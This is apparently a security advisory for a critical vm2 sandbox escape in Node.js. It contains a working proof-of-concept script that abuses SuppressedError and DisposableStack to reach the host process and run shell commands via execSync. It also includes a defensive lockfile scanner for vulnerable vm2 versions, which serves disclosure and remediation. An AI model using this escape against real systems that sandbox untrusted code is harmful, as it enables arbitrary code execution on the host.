CRITICAL 9.8
GHSA-55hx-c926-fr95
VM2 Has a Sandbox Escape Issue via SuppressedError
Details
In vm2 v3.10.4 on Node.js v24.13.0, `SuppressedError` allows attackers to escape the sandbox and run arbitrary code.
### PoC

```js
const { VM } = require("vm2");
const vm = new VM();
vm.run(`
  const ds = new DisposableStack();
  ds.defer(() => { throw null; });
  ds.defer(() => {
    const e = Error();
    e.name = Symbol();
    e.stack;
  });
  try {
    ds.dispose();
  } catch (e) {
    const Function = e.suppressed.constructor.constructor;
    const process = new Function("return process;")();
    const { execSync } = process.mainModule.require("node:child_process");
    execSync("echo pwned", { stdio: "inherit" });
  }
`);
```
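An added example, not part of the advisory or the vm2 project: a Node.js check that walks the `packages` map of a `package-lock.json` and flags every vm2 install older than v3.11.0, the release the advisory references (assumed here to be the first fixed version). The lockfile content is constructed for the demonstration.

```javascript
// Added example (not from the advisory): find vm2 installs below the
// release referenced in the advisory. 3.11.0 is assumed to be the fixed version.
const FIXED_VERSION = "3.11.0";

// Compare two dotted version strings numerically (major.minor.patch).
// Prerelease suffixes such as "-beta.1" are stripped before comparing.
// Returns -1, 0 or 1.
function compareVersions(a, b) {
  const pa = a.split("-")[0].split(".").map(Number);
  const pb = b.split("-")[0].split(".").map(Number);
  for (let i = 0; i < 3; i++) {
    const d = (pa[i] || 0) - (pb[i] || 0);
    if (d !== 0) return d < 0 ? -1 : 1;
  }
  return 0;
}

// Walk a lockfile v2/v3 "packages" map. Keys are install paths such as
// "node_modules/vm2" or "node_modules/foo/node_modules/vm2", so nested
// copies pulled in by other dependencies are found as well.
function findVulnerableVm2(lock) {
  const hits = [];
  for (const [path, meta] of Object.entries(lock.packages || {})) {
    if (!path.endsWith("node_modules/vm2") || !meta.version) continue;
    if (compareVersions(meta.version, FIXED_VERSION) < 0) {
      hits.push({ path, version: meta.version });
    }
  }
  return hits;
}

// Constructed sample lockfile: one direct vm2 install that is affected and
// one nested copy that is already at the referenced release.
const sampleLock = {
  lockfileVersion: 3,
  packages: {
    "": { name: "app", version: "1.0.0" },
    "node_modules/vm2": { version: "3.10.4" },
    "node_modules/some-lib": { version: "2.0.0" },
    "node_modules/some-lib/node_modules/vm2": { version: "3.11.0" },
  },
};

for (const h of findVulnerableVm2(sampleLock)) {
  console.log(`affected vm2 ${h.version} at ${h.path}`);
}
```

To check a real project, replace `sampleLock` with `JSON.parse` of its `package-lock.json`.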
References
- https://github.com/patriksimek/vm2/security/advisories/GHSA-55hx-c926-fr95 [WEB]
- https://nvd.nist.gov/vuln/detail/CVE-2026-26332 [ADVISORY]
- https://github.com/patriksimek/vm2/commit/119fd0aa1e4c27b08cf37946b2dafa99e2c754f0 [WEB]
- https://github.com/patriksimek/vm2/commit/4cb82cc94d9bb6c9a918b45f8c6790c32a5e913f [WEB]
- https://github.com/patriksimek/vm2/commit/7395c3a4b01d302e55271c87dbeb44d6b83b81ca [WEB]
- https://github.com/patriksimek/vm2/commit/792e16d56ee429ab19e284ed9c545f5e4694fb7d [WEB]
- https://github.com/patriksimek/vm2/commit/d715dd88c5aec5bbb4dce03ddf7c3eb3791d0338 [WEB]
- https://github.com/patriksimek/vm2 [PACKAGE]
- https://github.com/patriksimek/vm2/releases/tag/v3.11.0 [WEB]